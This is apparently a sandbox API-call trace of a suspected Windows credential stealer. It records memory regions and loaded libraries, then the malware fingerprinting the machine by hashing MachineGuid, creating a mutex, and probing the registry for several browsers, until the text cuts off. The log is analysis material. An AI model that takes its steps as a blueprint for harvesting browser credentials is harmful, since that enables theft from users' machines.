"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 448 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 449 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 450 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 451 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 452 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 453 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 454 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "dehbibhar.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe") Region: id = 455 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 456 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 457 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 458 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 459 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 460 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 461 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 462 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 463 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 466 start_va = 0x400000 end_va = 0x4a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 481 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 482 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 483 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 484 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 485 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 486 start_va = 0x600000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 487 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 488 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 489 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 490 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 491 start_va = 0x4b0000 end_va = 0x56dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 492 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 493 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 494 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 495 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 496 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 497 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 498 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 499 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 500 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 501 start_va = 0x780000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 502 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 503 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 504 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 505 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 506 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 507 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 508 start_va = 0x700000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 509 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 510 start_va = 0x880000 end_va = 0xa07fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 511 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 512 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 513 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 514 start_va = 0xa10000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 515 start_va = 0xba0000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 516 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 517 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 518 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 519 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 520 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 521 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 522 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 523 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 524 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 525 start_va = 0x6f720000 end_va = 0x6f732fff monitored = 0 entry_point = 0x6f729950 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 526 start_va = 0x6ead0000 end_va = 0x6eafefff monitored = 0 entry_point = 0x6eae95e0 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 527 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 528 start_va = 0x1fa0000 end_va = 0x22d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 529 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 530 start_va = 0x6e5d0000 end_va = 0x6e609fff monitored = 0 entry_point = 0x6e5e9be0 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 531 start_va = 0x74130000 end_va = 0x741f7fff monitored = 0 entry_point = 0x7419ae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 532 start_va = 0x75830000 end_va = 0x759a7fff monitored = 0 entry_point = 0x75888a90 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 533 start_va = 0x754c0000 end_va = 0x754cdfff monitored = 0 entry_point = 0x754c5410 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 534 start_va = 0x744a0000 end_va = 0x744a7fff monitored = 0 entry_point = 0x744a1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 535 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 536 start_va = 0x22e0000 end_va = 0x2389fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 537 start_va = 0x74d00000 end_va = 0x74d12fff monitored = 0 entry_point = 0x74d01d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 538 start_va = 0x74480000 end_va = 0x74494fff monitored = 0 entry_point = 0x74485210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 539 start_va = 0x74460000 end_va = 0x74472fff monitored = 0 entry_point = 0x74465c60 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\SysWOW64\\samlib.dll" (normalized: "c:\\windows\\syswow64\\samlib.dll") Region: id = 540 start_va = 0x74440000 end_va = 0x74458fff monitored = 0 entry_point = 0x744447e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 541 start_va = 0x6f920000 end_va = 0x6f96efff monitored = 0 entry_point = 0x6f92d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 542 start_va = 0x6efe0000 end_va = 0x6f063fff monitored = 0 entry_point = 0x6f006530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 543 start_va = 0x74ec0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74ec1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 544 start_va = 0x6fa10000 end_va = 0x6fa3efff monitored = 0 entry_point = 0x6fa1bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 545 start_va = 0x6e980000 end_va = 0x6e9c6fff monitored = 0 entry_point = 0x6e9958d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 546 start_va = 0x6e9d0000 end_va = 0x6e9d7fff monitored = 0 entry_point = 0x6e9d1920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 547 start_va = 0x5b0000 end_va = 0x5b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 548 start_va = 0x1f0000 end_va = 0x1f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 549 start_va = 0x700000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 550 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 551 start_va = 0x22e0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Thread: id = 10 os_tid = 0xbd4 [0311.784] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" [0311.785] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0311.818] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", pNumArgs=0x19ff7c | out: pNumArgs=0x19ff7c) returned 0x787ea0*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" [0311.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.820] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe", lpSrch="-u") returned 0x0 [0311.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0311.821] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", lpSrch="-u") returned 0x0 [0311.822] SetErrorMode (uMode=0x3) returned 0x0 [0311.822] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x74660000 [0311.823] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x75b90000 [0311.845] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x753d0000 [0311.872] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19fd7c | out: lpWSAData=0x19fd7c) returned 0 [0311.884] GetProcessHeap () returned 0x780000 [0311.884] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x793dc8 [0311.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.885] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fedc | out: phkResult=0x19fedc*=0x178) returned 0x0 [0311.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.928] RegQueryValueExA (in: hKey=0x178, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x793dc8, lpcbData=0x19fed8*=0x208 | out: lpType=0x0, lpData=0x793dc8*=0x30, lpcbData=0x19fed8*=0x25) returned 0x0 [0311.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.929] RegCloseKey (hKey=0x178) returned 0x0 [0311.929] GetProcessHeap () returned 0x780000 [0311.929] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x10) returned 0x78b640 [0311.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0311.930] CryptAcquireContextW (in: phProv=0x19febc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x19febc*=0x7864e0) returned 1 [0312.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.427] CryptCreateHash (in: hProv=0x7864e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x19fec0 | out: phHash=0x19fec0) returned 1 [0312.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.429] CryptHashData (hHash=0x78d0c8, pbData=0x793dc8, dwDataLen=0x24, dwFlags=0x0) returned 1 [0312.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.430] CryptGetHashParam (in: hHash=0x78d0c8, dwParam=0x2, pbData=0x78b640, pdwDataLen=0x19feb8, dwFlags=0x0 | out: pbData=0x78b640, pdwDataLen=0x19feb8) returned 1 [0312.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.431] CryptDestroyHash (hHash=0x78d0c8) returned 1 [0312.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0312.431] CryptReleaseContext (hProv=0x7864e0, dwFlags=0x0) returned 1 [0312.431] GetProcessHeap () returned 0x780000 [0312.431] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x31) returned 0x78d0c8 [0312.431] GetProcessHeap () returned 0x780000 [0312.432] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b640 | out: hHeap=0x780000) returned 1 [0312.432] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x78d0c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0312.432] GetProcessHeap () returned 0x780000 [0312.432] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x42) returned 0x786750 [0312.433] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x78d0c8, cbMultiByte=-1, lpWideCharStr=0x786750, cchWideChar=33 | out: lpWideCharStr="B7274519EDDE9BDC8AE51348A4AEC640") returned 33 [0312.433] GetProcessHeap () returned 0x780000 [0312.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x64) returned 0x7864e0 [0312.433] GetProcessHeap () returned 0x780000 [0312.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x786750 | out: hHeap=0x780000) returned 1 [0312.434] GetProcessHeap () returned 0x780000 [0312.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d0c8 | out: hHeap=0x780000) returned 1 [0312.434] GetProcessHeap () returned 0x780000 [0312.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x793dc8 | out: hHeap=0x780000) returned 1 [0312.434] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="B7274519EDDE9BDC8AE51348") returned 0x180 [0312.435] GetLastError () returned 0x0 [0312.435] GetProcessHeap () returned 0x780000 [0312.435] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1388) returned 0x794fe8 [0312.435] GetProcessHeap () returned 0x780000 [0312.435] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b448 [0312.448] GetProcessHeap () returned 0x780000 [0312.448] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.467] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x796378, pcbData=0x19fb98*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fb98*=0x104) returned 0x2 [0312.467] GetProcessHeap () returned 0x780000 [0312.468] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.468] GetProcessHeap () returned 0x780000 [0312.468] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.469] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x796378, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fba8*=0x104) returned 0x2 [0312.469] GetProcessHeap () returned 0x780000 [0312.469] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.481] GetProcessHeap () returned 0x780000 [0312.481] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.482] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x796378, pcbData=0x19fb9c*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fb9c*=0x104) returned 0x2 [0312.482] GetProcessHeap () returned 0x780000 [0312.483] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.483] GetProcessHeap () returned 0x780000 [0312.483] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.484] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x796378, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fba4*=0x104) returned 0x2 [0312.484] GetProcessHeap () returned 0x780000 [0312.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.485] GetProcessHeap () returned 0x780000 [0312.485] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.485] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x796378, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fb8c*=0x104) returned 0x2 [0312.485] GetProcessHeap () returned 0x780000 [0312.486] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.486] GetProcessHeap () returned 0x780000 [0312.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x796378 [0312.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.487] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x796378, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x796378, pcbData=0x19fb8c*=0x104) returned 0x2 [0312.487] GetProcessHeap () returned 0x780000 [0312.487] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796378 | out: hHeap=0x780000) returned 1 [0312.487] GetProcessHeap () returned 